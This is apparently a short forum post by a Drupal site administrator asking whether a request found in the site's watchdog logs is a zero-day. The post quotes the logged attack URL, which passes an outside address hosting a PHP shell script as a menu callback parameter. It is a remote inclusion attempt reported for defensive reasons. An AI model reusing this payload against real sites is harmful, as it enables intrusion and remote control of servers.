Hi, I have see this url into my watchdog logs:

drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?

where http://my3dwork.com/images/on.txt is  a php shell script.

any 0-day bug ?

I have tried to exec it on my site without "drupal/" and the result is that the browser is redirect to the homepage.


M.